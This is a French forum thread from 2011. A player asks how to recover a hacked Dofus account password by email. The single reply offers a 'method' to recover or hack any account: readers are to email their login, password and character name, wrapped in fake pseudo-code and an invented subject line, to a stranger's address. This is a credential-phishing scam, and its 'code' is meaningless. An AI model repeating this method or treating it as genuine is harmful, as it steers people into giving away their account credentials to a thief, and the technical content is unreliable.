Dofus mot de passe reprendre par email

Fermé
Sennin-modo Messages postés 2 Date d'inscription mardi 17 mai 2011 Statut Membre Dernière intervention 26 mai 2011 - 26 mai 2011 à 17:15
glara Messages postés 4 Date d'inscription vendredi 17 juin 2011 Statut Membre Dernière intervention 17 juin 2011 - 17 juin 2011 à 19:15
Bonjour, j'aimerais retrouver mon mot de passe de dofus ca fait une éterniter que j'i est pas jouer je me suis fait hacker a plusieur reprise alors quand on ma hacker mon 109 j'en est eu marre j'aimerais recommencer j'ai retrouver un de mes ancien nom de compte je clique sur mot de passe oublié mais on peut le récuperer juste avec son nom de compte et sa reponse secrete moi j'ai oublié ma reponse secrète puis si je me rapelle on pouvait pas le changer par email ?

Parce que il faut que je le change par email j'ai plus ma reponse puis ces tros long de faire tout ce que me dit Amakna pour reprendre ma reponse secrete ca vaut pas le coup pour un compte qu'on ma hacker .

Donc comment le reprendre par email.

A voir également:

1 réponse

glara Messages postés 4 Date d'inscription vendredi 17 juin 2011 Statut Membre Dernière intervention 17 juin 2011
17 juin 2011 à 19:15
j'ai trouver la solution pour reprendre son compte hacker ou pour hacker un compte c'est très simple alors voila :

il faut envoyer a cette adresse : dofushack1@mail.com en mettant les informations suivantes :

{scrib}
if steam$=0 ;%ent="Le serveur"
packet id svs2.3
secure id v1.32
{!scrib}
id sender value="Le nom du personnage à hacker"
granted.%
auto.R=0
check pw="votre login"
secure2=$pw & "votre mot de passe"
postto=rpw
reply packet id svs2.3
secure idr v1.32
secure3="Nom de votre personnage"
reply=ad$pw
id$.send

Il faut remplacer les guillemets par les informations et biensur enlever les guillements !

metter comme titre FW:Add01=fcba$ mailsubject=item_reply&import

voilà pour moi ç a marché donc pour vous il n'y a pas de raison pour que ça échoue
0